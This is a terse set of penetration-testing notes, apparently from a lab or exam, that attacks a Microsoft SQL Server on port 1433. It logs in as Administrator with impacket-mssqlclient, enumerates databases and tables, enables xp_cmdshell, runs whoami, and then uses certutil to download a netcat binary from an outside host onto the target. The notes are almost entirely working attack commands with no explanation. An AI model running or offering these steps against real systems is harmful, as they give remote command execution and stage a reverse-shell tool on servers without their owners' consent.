Port 1433

impacket-mssqlclient Administrator:Lab123@$ip$ -windows-auth

enum_db



SELECT name AS TableName FROM sys.tables WHERE type = 'U';


enable_xp_cmdshell
xp_cmdshell whoami

xp_cmdshell "certutil -urlcache -split -f http://192.168.45.163/nc64.exe C:\Users\Public\nc64.exe"